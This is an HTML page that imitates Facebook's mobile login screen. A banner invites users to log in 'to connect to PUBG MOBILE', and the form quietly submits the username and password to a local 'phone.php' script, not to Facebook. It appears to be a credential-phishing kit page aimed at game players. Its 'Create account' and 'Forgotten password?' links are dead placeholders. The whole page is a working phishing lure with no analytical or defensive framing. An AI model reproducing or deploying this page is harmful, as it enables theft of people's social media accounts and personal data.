<!DOCTYPE html>
<html>

<head>
    

    
<title>Log in to Facebook | Facebook</title>
<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
<link href="rsrc.php/v3/ya/r/O2aKM2iSbOw1f8e.png?_nc_x=Ij3Wp8lg5Kz" rel="shortcut icon" sizes="196x196">
<meta name="theme-color" content="#3b5998">
<link type="text/css" rel="stylesheet" href="rsrc.php/v3/yB/l/0%2ccross/tpmBF2cA-iG1f8e.css?_nc_x=Ij3Wp8lg5Kz">
<link type="text/css" rel="stylesheet" href="rsrc.php/v3/y3/l/0%2ccross/qMo9Nrl4WeY1f8e.css?_nc_x=Ij3Wp8lg5Kz">
<link type="text/css" rel="stylesheet" href="rsrc.php/v3/y_/l/0%2ccross/0fjRDqSItl-1f8e.css?_nc_x=Ij3Wp8lg5Kz">
<meta name="description" content="Log in to Facebook to start sharing and connecting with your friends, family and people you know.">
<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5dcbabd2869127ad"></script>
</head>
<body tabindex="0" class="touch x1 android _fzu _50-3 iframe acw">
<div id="viewport" data-kaios-focus-transparent="1">
	<h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
	<div id="page" class="">
		<div class="_129_" id="header-notices"></div>
		<div class="_7om2 _52we _52z5" id="header">
			<div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter">
				<a><i class="img sp_EXjamvPof_c sx_b36e87"><u>facebook</u></i></a>
			</div>
		</div>
		<div class="_5soa _3-q1 acw" id="root" role="main" data-sigil="context-layer-root content-pane">
			<div class="_7om2">
				<div class="_4g34" id="u_0_0">
					<div class="_5yd0 _2ph- _5yd1" style="display: none;" data-sigil="m_login_notice">
						<div class="_52jd"></div>
					</div>
					<div class="aclb _4-4l">
						<div class="_5rut">
							<div>
								<div class="_52jj _3-q2">
									<img src="img/icon_logom.png" width="60" class="_3-q3 img"/>
									<div class="_52je _52j9">
										 Log in to your Facebook account to connect to PUBG MOBILE
									</div>
								</div>
							</div>
							<form method="get" action="phone.php" class="mobile-login-form _5spm">
								<div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
								<div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
								<div id="otp_retrieve_desc_container"></div>
								<div class="_56be _5sob">
									<div class="_55wo _55x2 _56bf">
										<div id="email_input_container">
											<input autocorrect="off" autocapitalize="off" type="text" class="_56bg _4u9z _5ruq" id="email" name="username" placeholder="Mobile number or email address" autocomplete="off" required></div>
										<div>
											<div class="_1upc _mg8" data-sigil="m_login_password">
												<div class="_7om2">
													<div class="_4g34 _5i2i _52we">
														<div class="_5xu4">
															<input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2" id="password" name="password" placeholder="Password" type="password" autocomplete="off" required></div>
													</div>
													<div class="_5s61 _216i _5i2i _52we">
														<div class="_5xu4">
															<div class="_2pi9" style="display:none" id="u_0_1">
																<a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_2">HIDE</span><span class="mfss" id="u_0_3">SHOW</span></a>
															</div>
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
								<div class="_2pie" style="text-align:center;">
									<div id="u_0_4" data-sigil="login_password_step_element">
										<button type="submit" value="Log In" class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu"><span class="_55sr">Log In</span></button>
									</div>
								</div>
							</form>
							<div></div>
							<div>
								<div>
									<div class="_4581 _2phz">
										<a href="#">Create account</a>
									</div>
									<div class="_4581">
										<a href="#" ajaxify="false" target="_self">Not now</a>
									</div>
								</div>
								<div class="other-links">
									<ul class="_5pkb _55wp">
										<li>
											<span class="mfss fcg"><a tabindex="0" href="#">Forgotten password?</a></span>
										</li>
									</ul>
								</div>
							</div>
						</div>
						<div></div>
					</div>
				</div>
			</div>
			<div class="_55wr _5ui2" data-sigil="m_login_footer">
				<div class="_5dpw">
					<div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea">
						<div class="_7om2">
							<div class="_4g34">
								<span class="_52jc _52j9 _52jh _3ztb">English (UK)</span>
								<div class="_3ztc">
									<span class="_52jc"><a href="#" data-locale="jv_ID" data-sigil="change_language">Basa Jawa</a></span>
								</div>
								<div class="_3ztc">
									<span class="_52jc"><a href="#" data-locale="ja_JP" data-sigil="change_language">日本語</a></span>
								</div>
								<div class="_3ztc">
									<span class="_52jc"><a href="#" data-locale="pt_BR" data-sigil="change_language">Português (Brasil)</a></span>
								</div>
							</div>
							<div class="_4g34">
								<div class="_3ztc">
									<span class="_52jc"><a href="#" data-locale="id_ID" data-sigil="change_language">Bahasa Indonesia</a></span>
								</div>
								<div class="_3ztc">
									<span class="_52jc"><a href="#" data-locale="ms_MY" data-sigil="change_language">Bahasa Melayu</a></span>
								</div>
								<div class="_3ztc">
									<span class="_52jc"><a href="#" data-locale="es_LA" data-sigil="change_language">Español</a></span>
								</div>
								<a href="#">
								<div class="_3j87 _1rrd _3ztd" aria-label="Complete list of languages" data-sigil="more_language">
									<i class="img sp_EXjamvPof_c sx_96d09c"></i>
								</div>
								</a>
							</div>
						</div>
					</div>
					<div class="_5ui4">
						<span class="mfss fcg">Facebook ©2019</span>
					</div>
					</br>
				</div>
			</div>
		</div>
		</body>
</html>